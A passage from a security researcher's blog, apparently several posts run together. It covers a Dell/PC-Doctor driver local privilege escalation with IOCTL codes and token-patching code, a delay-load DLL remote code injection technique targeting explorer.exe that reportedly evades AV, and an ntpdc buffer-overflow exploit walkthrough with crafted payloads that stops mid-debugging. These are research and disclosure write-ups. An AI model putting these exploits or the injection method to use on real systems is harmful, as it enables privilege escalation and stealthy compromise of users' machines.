Once the driver is loaded, it exposes a symlink to the device at PCDSRVC{3B54B31B-D06B6431-06020200}_0 which is writable by unprivileged users on the system. This allows us to trigger one of the many IOCTLs exposed by the driver; approximately 30. I found a DLL used by the userland agent that served as an interface to the kernel driver and conveniently had symbol names available, allowing me to extract the following:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
// 0x222004 = driver activation ioctl
// 0x222314 = IoDriver::writePortData
// 0x22230c = IoDriver::writePortData
// 0x222304 = IoDriver::writePortData
// 0x222300 = IoDriver::readPortData
// 0x222308 = IoDriver::readPortData
// 0x222310 = IoDriver::readPortData
// 0x222700 = EcDriver::readData
// 0x222704 = EcDriver::writeData
// 0x222080 = MemDriver::getPhysicalAddress
// 0x222084 = MemDriver::readPhysicalMemory
// 0x222088 = MemDriver::writePhysicalMemory
// 0x222180 = Msr::readMsr
// 0x222184 = Msr::writeMsr
// 0x222104 = PciDriver::readConfigSpace
// 0x222108 = PciDriver::writeConfigSpace
// 0x222110 = PciDriver::?
// 0x22210c = PciDriver::?
// 0x222380 = Port1394::doesControllerExist
// 0x222384 = Port1394::getControllerConfigRom
// 0x22238c = Port1394::getGenerationCount
// 0x222388 = Port1394::forceBusReset
// 0x222680 = SmbusDriver::genericRead
// 0x222318 = SystemDriver::readCmos8
// 0x22231c = SystemDriver::writeCmos8
// 0x222600 = SystemDriver::getDevicePdo
// 0x222604 = SystemDriver::getIntelFreqClockCounts
// 0x222608 = SystemDriver::getAcpiThermalZoneInfo

Immediately the MemDriver class jumps out. After some reversing, it appeared that these functions do exactly as expected: allow userland services to both read and write arbitrary physical addresses. There are a few quirks, however.

To start, the driver must first be “unlocked” in order for it to begin processing control codes. It’s unclear to me if this is some sort of hacky event trigger or whether the kernel developers truly believed this would inhibit malicious access. Either way, it’s goofy. To unlock the driver, a simple ioctl with the proper code must be sent. Once received, the driver will process control codes for the lifetime of the system.

To unlock the driver, we just execute the following:

1
2
3
4
5
6
7
8
BOOL bResult;
DWORD dwRet;
SIZE_T code = 0xA1B2C3D4, outBuf;

bResult = DeviceIoControl(hDriver, 0x222004, 
                          &code, sizeof(SIZE_T), 
                          &outBuf, sizeof(SIZE_T), 
                          &dwRet, NULL);

Once the driver receives this control code and validates the received code (0xA1B2C3D4), it sets a global flag and begins accepting all other control codes.

Exploitation

From here, we could exploit this the same way rewolf did [4]: read out physical memory looking for process pool tags, then traverse these until we identify our process as well as a SYSTEM process, then steal the token. However, PCD appears to give us a shortcut via getPhysicalAddress ioctl. If this does indeed return the physical address of a given virtual address (VA), we can simply find the physical of our VA and enable a couple token privileges[5] using the writePhysicalMemory ioctl.

Here’s how the getPhysicalAddress function works:

1
2
3
4
5
6
7
8
v5 = IoAllocateMdl(**(PVOID **)(a1 + 0x18), 1u, 0, 0, 0i64);
v6 = v5;
if ( !v5 )
  return 0xC0000001i64;
MmProbeAndLockPages(v5, 1, 0);
**(_QWORD **)(v3 + 0x18) = v4 & 0xFFF | ((_QWORD)v6[1].Next << 0xC);
MmUnlockPages(v6);
IoFreeMdl(v6);

Keen observers will spot the problem here; the MmProbeAndLockPages call is passing in UserMode for the KPROCESSOR_MODE, meaning we won’t be able to resolve any kernel mode VAs, only usermode addresses.

We can still read chunks of physical memory unabated, however, as the readPhysicalMemory function is quite simple:

1
2
3
4
5
if ( !DoWrite )
{
  memmove(a1, a2, a3);
  return 1;
}

They reuse a single function for reading and writing physical memory; we’ll return to that. I decided to take a different approach than rewolf for a number of reasons with great results.

Instead, I wanted to toggle on SeDebugPrivilege for my current process token. This would require finding the token in memory and writing a few bytes at a field offset. To do this, I used readPhysicalMemory to read chunks of memory of size 0x10000000 and checked for the first field in a _TOKEN, TokenSource. In a user token, this will be the string User32. Once we’ve identified this, we double check that we’ve found a token by validating the TokenLuid, which we can obtain from userland using the GetTokenInformation API.

In order to speed up the memory search, I only iterate over the addresses that match the token’s virtual address byte index. Essentially, when you convert a virtual address to a physical address (PA) the byte index, or the lower 12 bits, do not change. To demonstrate, assume we have a VA of 0xfffff8a001cc2060. Translating this to a physical address then:

1
2
3
4
5
6
7
8
kd> !pte  fffff8a001cc2060
                                           VA fffff8a001cc2060
PXE at FFFFF6FB7DBEDF88    PPE at FFFFF6FB7DBF1400    PDE at FFFFF6FB7E280070    PTE at FFFFF6FC5000E610
contains 000000007AC84863  contains 00000000030D4863  contains 0000000073147863  contains E6500000716FD963
pfn 7ac84     ---DA--KWEV  pfn 30d4      ---DA--KWEV  pfn 73147     ---DA--KWEV  pfn 716fd     -G-DA--KW-V

kd> ? 716fd * 0x1000 + 060
Evaluate expression: 1903153248 = 00000000`716fd060

So our physical address is 0x716fd060 (if you’d like to read more about converting VA to PA, check out this great Microsoft article[6]). Notice the lower 12 bits remain the same between VA/PA. The search loop then boiled down to the following code:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
uStartAddr = uStartAddr + (VirtualAddress & 0xfff);
for (USHORT chunk = 0; chunk < 0xb; ++chunk) {
    lpMemBuf = ReadBlockMem(hDriver, uStartAddr, 0x10000000);
    for(SIZE_T i = 0; i < 0x10000000; i += 0x1000, uStartAddr += 0x1000){
        if (memcmp((DWORD)lpMemBuf + i, "User32 ", 8) == 0){
            
            if (TokenId <= 0x0)
                FetchTokenId();

            if (*(DWORD*)((char*)lpMemBuf + i + 0x10) == TokenId) {
                hTokenAddr = uStartAddr;
                break;
            }
        }
    }

    HeapFree(GetProcessHeap(), 0, lpMemBuf);

    if (hTokenAddr > 0x0)
        break;
}

Once we identify the PA of our token, we trigger two separate writes at offset 0x40 and offset 0x48, or the Enabled and Default fields of a _TOKEN. This sometimes requires a few runs to get right (due to mapping, which I was too lazy to work out), but is very stable.

You can find the source code for the bug here.

Timeline

04/05/18 – Vulnerability reported
04/06/18 – Initial response from Dell
04/10/18 – Status update from Dell
04/18/18 – Status update from Dell
05/16/18 – Patched version released (v2.2)

References

[0] http://www.dell.com/support/contents/us/en/04/article/product-support/self-support-knowledgebase/software-and-downloads/supportassist [1] http://blog.rewolf.pl/blog/?p=1630 [2] https://www.exploit-db.com/exploits/39785/ [3] http://www.pc-doctor.com/ [4] https://github.com/rwfpl/rewolf-msi-exploit [5] https://github.com/hatRiot/token-priv [6] https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/converting-virtual-addresses-to-physical-addresses\

Abusing delay load DLLs for remote code injection

19 September 2017 at 21:00

I always tell myself that I’ll try posting more frequently on my blog, and yet here I am, two years later. Perhaps this post will provide the necessary motiviation to conduct more public research. I do love it.

This post details a novel remote code injection technique I discovered while playing around with delay loading DLLs. It allows for the injection of arbitrary code into arbitrary remote, running processes, provided that they implement the abused functionality. To make it abundantly clear, this is not an exploit, it’s simply another strategy for migrating into other processes.

Modern code injection techniques typically rely on a variation of two different win32 API calls: CreateRemoteThread and NtQueueApc. Endgame recently put out a great article[0] detailing ten various methods of process injection. While not all of them allow for injection into remote processes, particularly those already running, it does detail the most common, public variations. This strategy is more akin to inline hooking, though we’re not touching the IAT and we don’t require our code to already be in the process. There are no calls to NtQueueApc or CreateRemoteThread, and no need for thread or process suspension. There are some limitations, as with anything, which I’ll detail below.

Delay Load DLL

Delay loading is a linker strategy that allows for the lazy loading of DLLs. Executables commonly load all necessary dynamically linked libraries at runtime and perform the IAT fix-ups then. Delay loading, however, allows for these libraries to be lazy loaded at call time, supported by a pseudo IAT that’s fixed-up on first call. This process can be better illuminated by the following, decades old figure below:

This image comes from a great Microsoft article released in 1998 [1] that describes the strategy quite well, but I’ll attempt to distill it here.

Portable executables contain a data directory named IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT, which you can see using dumpbin /imports or using windbg. The structure of this entry is described in delayhlp.cpp, included with the WinSDK:

1
2
3
4
5
6
7
8
9
10
11
struct InternalImgDelayDescr {
    DWORD           grAttrs;        // attributes
    LPCSTR          szName;         // pointer to dll name
    HMODULE *       phmod;          // address of module handle
    PImgThunkData   pIAT;           // address of the IAT
    PCImgThunkData  pINT;           // address of the INT
    PCImgThunkData  pBoundIAT;      // address of the optional bound IAT
    PCImgThunkData  pUnloadIAT;     // address of optional copy of original IAT
    DWORD           dwTimeStamp;    // 0 if not bound,
                                    // O.W. date/time stamp of DLL bound to (Old BIND)
    };

The table itself contains RVAs, not pointers. We can find the delay directory offset by parsing the file header:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
0:022> lm m explorer
start    end        module name
00690000 00969000   explorer   (pdb symbols)          
0:022> !dh 00690000 -f

File Type: EXECUTABLE IMAGE
FILE HEADER VALUES

[...] 

   68A80 [      40] address [size] of Load Configuration Directory
       0 [       0] address [size] of Bound Import Directory
    1000 [     D98] address [size] of Import Address Table Directory
   AC670 [     140] address [size] of Delay Import Directory
       0 [       0] address [size] of COR20 Header Directory
       0 [       0] address [size] of Reserved Directory

The first entry and it’s delay linked DLL can be seen in the following:

1
2
3
4
5
0:022> dd 00690000+ac670 l8
0073c670  00000001 000ac7b0 000b24d8 000b1000
0073c680  000ac8cc 00000000 00000000 00000000
0:022> da 00690000+000ac7b0 
0073c7b0  "WINMM.dll"

This means that WINMM is dynamically linked to explorer.exe, but delay loaded, and will not be loaded into the process until the imported function is invoked. Once loaded, a helper function fixes up the psuedo IAT by using GetProcAddress to locate the desired function and patching the table at runtime.

The pseudo IAT referenced is separate from the standard PE IAT; this IAT is specifically for the delay load functions, and is referenced from the delay descriptor. So for example, in WINMM.dll’s case, the pseudo IAT for WINMM is at RVA 000b1000. The second delay descriptor entry would have a separate RVA for its pseudo IAT, and so on and so forth.

Using WINMM as our delay example, explorer imports one function from it, PlaySoundW. In my particular running instance, it has not been invoked, so the pseudo IAT has not been fixed up yet. We can see this by dumping it’s pseudo IAT entry:

1
2
3
0:022> dps 00690000+000b1000 l2
00741000  006dd0ac explorer!_imp_load__PlaySoundW
00741004  00000000

Each DLL entry is null terminated. The above pointer shows us that the existing entry is merely a springboard thunk within the Explorer process. This takes us here:

1
2
3
4
5
6
7
8
9
10
0:022> u explorer!_imp_load__PlaySoundW
explorer!_imp_load__PlaySoundW:
006dd0ac b800107400      mov     eax,offset explorer!_imp__PlaySoundW (00741000)
006dd0b1 eb00            jmp     explorer!_tailMerge_WINMM_dll (006dd0b3)
explorer!_tailMerge_WINMM_dll:
006dd0b3 51              push    ecx
006dd0b4 52              push    edx
006dd0b5 50              push    eax
006dd0b6 6870c67300      push    offset explorer!_DELAY_IMPORT_DESCRIPTOR_WINMM_dll (0073c670)
006dd0bb e8296cfdff      call    explorer!__delayLoadHelper2 (006b3ce9)

The tailMerge function is a linker-generated stub that’s compiled in per-DLL, not per function. The __delayLoadHelper2 function is the magic that handles the loading and patching of the pseudo IAT. Documented in delayhlp.cpp, this function handles calling LoadLibrary/GetProcAddress and patching the pseudo IAT. As a demonstration of how this looks, I compiled a binary that delay links dnslib. Here’s the process of resolution of DnsAcquireContextHandle:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
0:000> dps 00060000+0001839c l2
0007839c  000618bd DelayTest!_imp_load_DnsAcquireContextHandle_W
000783a0  00000000
0:000> bp DelayTest!__delayLoadHelper2
0:000> g
ModLoad: 753e0000 7542c000   C:\Windows\system32\apphelp.dll
Breakpoint 0 hit
[...]
0:000> dd esp+4 l1
0024f9f4  00075ffc
0:000> dd 00075ffc l4
00075ffc  00000001 00010fb0 000183c8 0001839c
0:000> da 00060000+00010fb0 
00070fb0  "DNSAPI.dll"
0:000> pt
0:000> dps 00060000+0001839c l2
0007839c  74dfd0fc DNSAPI!DnsAcquireContextHandle_W
000783a0  00000000

Now the pseudo IAT entry has been patched up and the correct function is invoked on subsequent calls. This has the additional side effect of leaving the pseudo IAT as both executable and writable:

1
2
3
4
0:011> !vprot 00060000+0001839c
BaseAddress:       00371000
AllocationBase:    00060000
AllocationProtect: 00000080  PAGE_EXECUTE_WRITECOPY

At this point, the DLL has been loaded into the process and the pseudo IAT patched up. In another additional twist, not all functions are resolved on load, only the one that is invoked. This leaves certain entries in the pseudo IAT in a mixed state:

1
2
3
4
5
6
7
00741044  00726afa explorer!_imp_load__UnInitProcessPriv
00741048  7467f845 DUI70!InitThread
0074104c  00726b0f explorer!_imp_load__UnInitThread
00741050  74670728 DUI70!InitProcessPriv
0:022> lm m DUI70
start    end        module name
74630000 746e2000   DUI70      (pdb symbols)

In the above, two of the four functions are resolved and the DUI70.dll library is loaded into the process. In each entry of the delay load descriptor, the structure referenced above maintains an RVA to the HMODULE. If the module isn’t loaded, it will be null. So when a delayed function is invoked that’s already loaded, the delay helper function will check it’s entry to determine if a handle to it can be used:

1
2
3
4
5
6
7
8
HMODULE hmod = *idd.phmod;
    if (hmod == 0) {
        if (__pfnDliNotifyHook2) {
            hmod = HMODULE(((*__pfnDliNotifyHook2)(dliNotePreLoadLibrary, &dli)));
            }
        if (hmod == 0) {
            hmod = ::LoadLibraryEx(dli.szDll, NULL, 0);
            }

The idd structure is just an instance of the InternalImgDelayDescr described above and passed into the __delayLoadHelper2 function from the linker tailMerge stub. So if the module is already loaded, as referenced from delay entry, then it uses that handle instead. It does NOT attempt to LoadLibrary irregardless of this value; this can be used to our advantage.

Another note here is that the delay loader supports notification hooks. There are six states we can hook into: processing start, pre load library, fail load library, pre GetProcAddress, fail GetProcAddress, and end processing. You can see how the hooks are used in the above code sample.

Finally, in addition to delay loading, the portable executable also supports delay library unloading. It works pretty much how you’d expect it, so we won’t be touching on it here.

Limitations

Before detailing how we might abuse this (though it should be fairly obvious), it’s important to note the limitations of this technique. It is not completely portable, and using pure delay load functionality it cannot be made to be so.

The glaring limitation is that the technique requires the remote process to be delay linked. A brief crawl of some local processes on my host shows many Microsoft applications are: dwm, explorer, cmd. Many non-Microsoft applications are as well, including Chrome. It is additionally a well supported function of the portable executable, and exists today on modern systems.

Another limitation is that, because at it’s core it relies on LoadLibrary, there must exist a DLL on disk. There is no way to LoadLibrary from memory (unless you use one of the countless techniques to do that, but none of which use LoadLibrary…).

In addition to implementing the delay load, the remote process must implement functionality that can be triggered. Instead of doing a CreateRemoteThread, SendNotifyMessage, or ResumeThread, we rely on the fetch to the pseudo IAT, and thus we must be able to trigger the remote process into performing this action/executing this function. This is generally pretty easy if you’re using the suspended process/new process strategy, but may not be trivial on running applications.

Finally, any process that does not allow unsigned libraries to be loaded will block this technique. This is controlled by ProcessSignaturePolicy and can be set with SetProcessMitigationPolicy[2]; it is unclear how many apps are using this at the moment, but Microsoft Edge was one of the first big products to be employing this policy. This technique is also impacted by the ProcessImageLoadPolicy policy, which can be set to restrict loading of images from a UNC share.

Abuse

When discussing an ability to inject code into a process, there are three separate cases an attacker may consider, and some additional edge situations within remote processes. Local process injection is simply the execution of shellcode/arbitrary code within the current process. Suspended process is the act of spawning a new, suspended process from an existing, controlled one and injecting code into it. This is a fairly common strategy to employ for migrating code, setting up backup connections, or establishing a known process state prior to injection. The final case is the running remote process.

The running remote process is an interesting case with several caveats that we’ll explore below. I won’t detail suspended processes, as it’s essentially the same as a running process, but easier. It’s easier because many applications actually just load the delay library at runtime, either because the functionality is environmentally keyed and required then, or because another loaded DLL is linked against it and requires it. Refer to the source code for the project for an implementation of suspended process injection [3].

Local Process

The local process is the most simple and arguably the most useless for this strategy. If we can inject and execute code in this manner, we might as well link against the library we want to use. It serves as a fine introduction to the topic, though.

The first thing we need to do is delay link the executable against something. For various reasons I originally chose dnsapi.dll. You can specify delay load DLLs via the linker options for Visual Studio.

With that, we need to obtain the RVA for the delay directory. This can be accomplished with the following function:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
IMAGE_DELAYLOAD_DESCRIPTOR*
findDelayEntry(char *cDllName)
{
    PIMAGE_DOS_HEADER pImgDos = (PIMAGE_DOS_HEADER)GetModuleHandle(NULL);
    PIMAGE_NT_HEADERS pImgNt = (PIMAGE_NT_HEADERS)((LPBYTE)pImgDos + pImgDos->e_lfanew);
    PIMAGE_DELAYLOAD_DESCRIPTOR pImgDelay = (PIMAGE_DELAYLOAD_DESCRIPTOR)((LPBYTE)pImgDos + 
            pImgNt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT].VirtualAddress);
    DWORD dwBaseAddr = (DWORD)GetModuleHandle(NULL);
    IMAGE_DELAYLOAD_DESCRIPTOR *pImgResult = NULL;

    // iterate over entries 
    for (IMAGE_DELAYLOAD_DESCRIPTOR* entry = pImgDelay; entry->ImportAddressTableRVA != NULL; entry++){
        char *_cDllName = (char*)(dwBaseAddr + entry->DllNameRVA);
        if (strcmp(_cDllName, cDllName) == 0){
            pImgResult = entry;
            break;
        }
    }

    return pImgResult;
}

Should be pretty clear what we’re doing here. Once we’ve got the correct table entry, we need to mark the entry’s DllName as writable, overwrite it with our custom DLL name, and restore the protection mask:

1
2
3
4
5
IMAGE_DELAYLOAD_DESCRIPTOR *pImgDelayEntry = findDelayEntry("DNSAPI.dll");
DWORD dwEntryAddr = (DWORD)((DWORD)GetModuleHandle(NULL) + pImgDelayEntry->DllNameRVA);
VirtualProtect((LPVOID)dwEntryAddr, sizeof(DWORD), PAGE_READWRITE, &dwOldProtect);
WriteProcessMemory(GetCurrentProcess(), (LPVOID)dwEntryAddr, (LPVOID)ndll, strlen(ndll), &wroteBytes);
VirtualProtect((LPVOID)dwEntryAddr, sizeof(DWORD), dwOldProtect, &dwOldProtect);

Now all that’s left to do is trigger the targeted function. Once triggered, the delay helper function will snag the DllName from the table entry and load the DLL via LoadLibrary.

Remote Process

The most interesting of cases is the running remote process. For demonstration here, we’ll be targeting explorer.exe, as we can almost always rely on it to be running on a workstation under the current user.

With an open handle to the explorer process, we must perform the same searching tasks as we did for the local process, but this time in a remote process. This is a little more cumbersome, but the code can be found in the project repository for reference[3]. We simply grab the remote PEB, parse the image and it’s directories, and locate the appropriate delay entry we’re targeting.

This part is likely to prove the most unfriendly when attempting to port this to another process; what functionality are we targeting? What function or delay load entry is generally unused, but triggerable from the current session? With explorer there are several options; it’s delay linked against 9 different DLLs, each averaging 2-3 imported functions. Thankfully one of the first functions I looked at was pretty straightforward: CM_Request_Eject_PC. This function, exported by CFGMGR32.dll, requests that the system be ejected from the local docking station[4]. We can therefore assume that it’s likely to be available and not fixed on workstations, and potentially unfixed on laptops, should the user never explicitly request the system to be ejected.

When we request for the workstation to be ejected from the docking station, the function sends a PNP request. We use the IShellDispatch object to execute this, which is accessed via Shell, handled by, you guessed it, explorer.

The code for this is pretty simple:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
HRESULT hResult = S_FALSE;
IShellDispatch *pIShellDispatch = NULL;

CoInitialize(NULL);

hResult = CoCreateInstance(CLSID_Shell, NULL, CLSCTX_INPROC_SERVER, 
                           IID_IShellDispatch, (void**)&pIShellDispatch);
if (SUCCEEDED(hResult))
{
    pIShellDispatch->EjectPC();
    pIShellDispatch->Release();
}

CoUninitialize();

Our DLL only needs to export CM_Request_Eject_PC for us to not crash the process; we can either pass on the request to the real DLL, or simply ignore it. This leads us to stable and reliable remote code injection.

Remote Process – All Fixed

One interesting edge case is a remote process that you want to inject into via delay loading, but all imported functions have been resolved in the pseudo IAT. This is a little more complicated, but all hope is not lost.

Remember when I mentioned earlier that a handle to the delay load library is maintained in its descriptor? This is the value that the helper function checks for to determine if it should reload the module or not; if it’s null, it attempts to load it, if it’s not, it uses that handle. We can abuse this check by nulling out the module handle, thereby “tricking” the helper function into once again loading that descriptor’s DLL.

In the discussed case, however, the pseudo IAT is all patched up; no more trampolines into the delay load helper function. Helpfully the pseudo IAT is writable by default, so we can simply patch in the trampoline function ourselves and have it instantiate the descriptor all over again. In short, this worst-case strategy requires three separate WriteProcessMemory calls: one to null out the module handle, one to overwrite the pseudo IAT entry, and one to overwrite the loaded DLL name.

Conclusions

I should make mention that I tested this strategy across several next gen AV/HIPS appliances, which will go unnamed here, and none where able to detect the cross process injection strategy. It would seem overall to be an interesting challenge at detection; in remote processes, the strategy uses the following chain of calls:

1
2
3
4
5
6
7
8
OpenProcess(..);

ReadRemoteProcess(..); // read image
ReadRemoteProcess(..); // read delay table 
ReadRemoteProcess(..); // read delay entry 1...n

VirtualProtectEx(..);
WriteRemoteProcess(..);

That’s it. The trigger functionality would be dynamic among each process, and the loaded library would be loaded via supported and well-known Windows facilities. I checked out a few other core Windows applications, and they all have pretty straightforward trigger strategies.

The referenced project[3] includes both x86 and x64 support, and has been tested across Windows 7, 8.1, and 10. It includes three functions of interest: inject_local, inject_suspended, and inject_explorer. It expects to find the DLL at C:\Windows\Temp\TestDLL.dll, but this can obviously be changed. Note that it isn’t production quality; beware, here be dragons.

Special thanks to Stephen Breen for reviewing this post

References

[0] https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
[1] https://www.microsoft.com/msj/1298/hood/hood1298.aspx
[2] https://msdn.microsoft.com/en-us/library/windows/desktop/hh769088(v=vs.85).aspx
[3] https://github.com/hatRiot/DelayLoadInject
[4] https://msdn.microsoft.com/en-us/library/windows/hardware/ff539811(v=vs.85).aspx

Abusing Token Privileges for EoP

1 September 2017 at 21:00

This is just a placeholder post to link off to Stephen Breen and I’s paper on abusing token privileges. You can read the entire paper here[0]. I also recommend checking out the blogpost he posted on Foxglove here[1].

[0] https://raw.githubusercontent.com/hatRiot/token-priv/master/abusing_token_eop_1.0.txt
[1] https://foxglovesecurity.com/2017/08/25/abusing-token-privileges-for-windows-local-privilege-escalation/

ntpdc local buffer overflow

6 January 2015 at 21:10

Alejandro Hdez (@nitr0usmx) recently tweeted about a trivial buffer overflow in ntpdc, a deprecated NTP query tool still available and packaged with any NTP install. He posted a screenshot of the crash as the result of a large buffer passed into a vulnerable gets call. After digging into it a bit, I decided it’d be a fun exploit to write, and it was. There are a few quarks to it that make it of particular interest, of which I’ve detailed below.

As noted, the bug is the result of a vulnerable gets, which can be crashed with the following:

1
2
3
$ python -c 'print "A"*600' | ntpdc
***Command `AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' unknown
Segmentation fault

Loading into gdb on an x86 Debian 7 system:

1
2
3
4
5
6
7
8
9
10
11
12
gdb-peda$ i r eax edx esi
eax            0x41414141   0x41414141
edx            0x41414141   0x41414141
esi            0x41414141   0x41414141
gdb-peda$ x/i $eip
=> 0xb7fa1d76 <el_gets+22>: mov    eax,DWORD PTR [esi+0x14]
gdb-peda$ checksec
CANARY    : ENABLED
FORTIFY   : ENABLED
NX        : ENABLED
PIE       : disabled
RELRO     : Partial

Notice the checksec results of the binary, now compare this to a snippet of the paxtest output:

1
2
3
4
5
6
7
8
9
10
Mode: Blackhat
Linux deb7-32 3.2.0-4-486 #1 Debian 3.2.63-2+deb7u2 i686 GNU/Linux

Executable anonymous mapping             : Vulnerable
Executable bss                           : Vulnerable
Executable data                          : Vulnerable
Executable heap                          : Vulnerable
Executable stack                         : Vulnerable
Executable shared library bss            : Vulnerable
Executable shared library data           : Vulnerable

And the result of Debian’s recommended hardening-check:

1
2
3
4
5
6
7
$ hardening-check /usr/bin/ntpdc 
/usr/bin/ntpdc:
 Position Independent Executable: no, normal executable!
 Stack protected: yes
 Fortify Source functions: yes (some protected functions found)
 Read-only relocations: yes
 Immediate binding: no, not found!

Interestingly enough, I discovered this oddity after I had gained code execution in a place I shouldn’t have. We’re also running with ASLR enabled:

1
2
$ cat /proc/sys/kernel/randomize_va_space 
2

I’ll explain why the above is interesting in a moment.

So in our current state, we control three registers and an instruction dereferencing ESI+0x14. If we take a look just a few instructions ahead, we see the following:

1
2
3
4
5
6
7
8
gdb-peda$ x/8i $eip
=> 0xb7fa1d76 <el_gets+22>: mov    eax,DWORD PTR [esi+0x14] ; deref ESI+0x14 and move into EAX
   0xb7fa1d79 <el_gets+25>: test   al,0x2                   ; test lower byte against 0x2
   0xb7fa1d7b <el_gets+27>: je     0xb7fa1df8 <el_gets+152> ; jump if ZF == 1
   0xb7fa1d7d <el_gets+29>: mov    ebp,DWORD PTR [esi+0x2c] ; doesnt matter 
   0xb7fa1d80 <el_gets+32>: mov    DWORD PTR [esp+0x4],ebp  ; doesnt matter
   0xb7fa1d84 <el_gets+36>: mov    DWORD PTR [esp],esi      ; doesnt matter
   0xb7fa1d87 <el_gets+39>: call   DWORD PTR [esi+0x318]    ; call a controllable pointer 

I’ve detailed the instructions above, but essentially we’ve got a free CALL. In order to reach this, we need an ESI value that at +0x14 will set ZF == 0 (to bypass the test/je) and at +0x318 will point into controlled data.

Naturally, we should figure out where our payload junk is and go from there.

1
2
3
4
5
6
7
8
9
10
11
12
13
gdb-peda$ searchmem 0x41414141
Searching for '0x41414141' in: None ranges
Found 751 results, display max 256 items:
 ntpdc : 0x806ab00 ('A' <repeats 200 times>...)
gdb-peda$ maintenance i sections
[snip]
0x806a400->0x806edc8 at 0x00021400: .bss ALLOC
gdb-peda$ vmmap
Start      End        Perm  Name
0x08048000 0x08068000 r-xp  /usr/bin/ntpdc
0x08068000 0x08069000 r--p  /usr/bin/ntpdc
0x08069000 0x0806b000 rw-p  /usr/bin/ntpdc
[snip]

Our payload is copied into BSS, which is beneficial as this will remain unaffected by ASLR, further bonus points because our binary wasn’t compiled with PIE. We now need to move back -0x318 and look for a value that will set ZF == 0 with the test al,0x2 instruction. A value at 0x806a9e1 satisfies both the +0x14 and +0x318 requirements:

1
2
3
4
gdb-peda$ x/wx 0x806a9cd+0x14
0x806a9e1:  0x6c61636f
gdb-peda$ x/wx 0x806a9cd+0x318
0x806ace5:  0x41414141

After figuring out the offset in the payload for ESI, we just need to plug 0x806a9cd in and hopefully we’ll have EIP:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
$ python -c 'print "A"*485 + "C"*4 + "A"*79 + "\xcd\xa9\x06\x08" + "C"*600' > crash.info
$ gdb -q /usr/bin/ntpdc
$ r < crash.info

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x6c61636f ('ocal')
EBX: 0xb7fabff4 --> 0x1fe40 
ECX: 0xb7dc13c0 --> 0x0 
EDX: 0x43434343 ('CCCC')
ESI: 0x806a9cd --> 0x0 
EDI: 0x0 
EBP: 0x0 
ESP: 0xbffff3cc --> 0xb7fa1d8d (<el_gets+45>:   cmp    eax,0x1)
EIP: 0x43434343 ('CCCC')
EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x43434343
[------------------------------------stack-------------------------------------]
0000| 0xbffff3cc --> 0xb7fa1d8d (<el_gets+45>:  cmp    eax,0x1)
0004| 0xbffff3d0 --> 0x806a9cd --> 0x0 
0008| 0xbffff3d4 --> 0x0 
0012| 0xbffff3d8 --> 0x8069108 --> 0xb7d7a4d0 (push   ebx)
0016| 0xbffff3dc --> 0x0 
0020| 0xbffff3e0 --> 0xb7c677f4 --> 0x1cce 
0024| 0xbffff3e4 --> 0x807b6f8 ('A' <repeats 200 times>...)
0028| 0xbffff3e8 --> 0x807d3b0 ('A' <repeats 200 times>...)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x43434343 in ?? ()

Now that we’ve got EIP, it’s a simple matter of stack pivoting to execute a ROP payload. Let’s figure out where that "C"*600 lands in memory and redirect EIP there:

1
2
3
4
5
6
gdb-peda$ searchmem 0x43434343
Searching for '0x43434343' in: None ranges
Found 755 results, display max 256 items:
 ntpdc : 0x806ace5 ("CCCC", 'A' <repeats 79 times>, "ͩ\006\b", 'C' <repeats 113 times>...)
 ntpdc : 0x806ad3c ('C' <repeats 200 times>...)
 [snip]

And we’ll fill it with \xcc to ensure we’re there (theoretically triggering NX):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
$ python -c 'print "A"*485 + "\x3c\xad\x06\x08" + "A"*79 + "\xcd\xa9\x06\x08" + "\xcc"*600' > crash.info
$ gdb -q /usr/bin/ntpdc
Reading symbols from /usr/bin/ntpdc...(no debugging symbols found)...done.
gdb-peda$ r < crash.info 
[snip]
Program received signal SIGTRAP, Trace/breakpoint trap.
[----------------------------------registers-----------------------------------]
EAX: 0x6c61636f ('ocal')
EBX: 0xb7fabff4 --> 0x1fe40 
ECX: 0xb7dc13c0 --> 0x0 
EDX: 0xcccccccc 
ESI: 0x806a9cd --> 0x0 
EDI: 0x0 
EBP: 0x0 
ESP: 0xbffff3ec --> 0xb7fa1d8d (<el_gets+45>:   cmp    eax,0x1)
